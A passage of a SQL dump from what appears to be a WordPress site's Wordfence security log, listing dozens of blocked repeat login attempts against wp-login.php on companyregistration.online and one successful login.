Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7517,1564474132.859018,1564474132.488300,'\0\0\0\0\0\0\0\0\0\0\\r^',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7516,1564474134.221589,1564474133.899500,'\0\0\0\0\0\0\0\0\0\0\\r^',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7515,1564474135.310353,1564474134.985700,'\0\0\0\0\0\0\0\0\0\0\\r^',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7514,1564474136.449803,1564474136.089600,'\0\0\0\0\0\0\0\0\0\0\\r^',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7513,1564474137.870492,1564474137.533000,'\0\0\0\0\0\0\0\0\0\0\\r^',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7512,0.000000,1564474113.404990,'\0\0\0\0\0\0\0\0\0\0\\r^',0,503,0,0,0,'https://companyregistration.online/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7511,1564473008.297434,1564473007.048200,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7510,1564473010.809371,1564473009.674100,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7509,1564473013.222833,1564473012.118300,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7508,1564473015.340943,1564473014.369500,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7507,1564473017.521853,1564473016.693800,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7506,1564473019.631151,1564473018.812000,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7505,1564473021.539367,1564473020.630500,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7504,1564473023.212617,1564473022.444500,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7503,1564473025.086293,1564473024.307900,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7502,1564473026.378555,1564473025.874000,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7501,1564473027.633601,1564473027.140000,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7500,1564473028.960113,1564473028.487000,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7499,1564473030.128427,1564473029.736500,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7498,1564473031.385533,1564473030.903200,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7497,1564473032.601668,1564473032.175700,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7496,1564473033.883608,1564473033.411600,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7495,1564473035.105571,1564473034.715700,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7494,1564473036.274775,1564473035.946900,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7493,1564473037.500393,1564473037.065700,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7492,1564473038.627277,1564473038.231200,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7491,1564473039.766597,1564473039.348800,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7490,1564473041.109090,1564473040.611200,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7489,1564473042.247775,1564473041.870000,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7488,1564473043.561369,1564473043.083900,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7487,1564473044.790882,1564473044.431300,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7486,1564473046.001366,1564473045.620800,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7485,1564473047.185232,1564473046.806600,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7484,1564473048.309957,1564473047.985800,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7483,1564473050.904018,1564473050.563900,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7482,1564473052.174650,1564473051.754600,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7481,1564473053.247850,1564473052.895000,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7480,1564473054.253015,1564473053.947600,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7479,1564473055.306939,1564473054.978000,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7478,1564473056.357231,1564473056.038900,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7477,1564473057.510873,1564473057.125300,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7476,1564473058.708901,1564473058.325200,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7475,1564473059.880895,1564473059.550700,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7474,1564473061.219481,1564473060.642600,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7473,1564473062.640063,1564473062.048000,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7471,0.000000,1564473003.397132,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7472,1564473064.019653,1564473063.555700,'\0\0\0\0\0\0\0\0\0\0$f',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7470,0.000000,1564472277.829801,'\0\0\0\0\0\0\0\0\0\0G',0,302,0,3,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2Fplugin-install.php%3Fs%3Dconditional%26tab%3Dsearch%26type%3Dterm&reauth=1','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36','loginOK',NULL,NULL),(7469,1564470655.803914,1564470655.417200,'\0\0\0\0\0\0\0\0\0\0\rA',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7468,1564470662.737882,1564470662.197000,'\0\0\0\0\0\0\0\0\0\0\rA',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7467,1564470673.196950,1564470672.661900,'\0\0\0\0\0\0\0\0\0\0\rA',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7466,1564470679.572457,1564470679.031500,'\0\0\0\0\0\0\0\0\0\0\rA',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7465,1564470686.378187,1564470685.808500,'\0\0\0\0\0\0\0\0\0\0\rA',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7464,1564470695.567410,1564470695.170100,'\0\0\0\0\0\0\0\0\0\0\rA',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7463,1564470701.969017,1564470701.442500,'\0\0\0\0\0\0\0\0\0\0\rA',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7462,1564470708.234396,1564470707.840600,'\0\0\0\0\0\0\0\0\0\0\rA',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7461,1564470719.416226,1564470719.056300,'\0\0\0\0\0\0\0\0\0\0\rA',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7460,1564470726.219684,1564470725.710300,'\0\0\0\0\0\0\0\0\0\0\rA',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7459,1564470731.533149,1564470731.164000,'\0\0\0\0\0\0\0\0\0\0\rA',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7458,1564470740.640967,1564470740.207200,'\0\0\0\0\0\0\0\0\0\0\rA',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7457,1564470746.956989,1564470746.422000,'\0\0\0\0\0\0\0\0\0\0\rA',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7456,1564470752.590036,1564470752.000700,'\0\0\0\0\0\0\0\0\0\0\rA',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7455,1564470766.774212,1564470766.274900,'\0\0\0\0\0\0\0\0\0\0\rA',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security 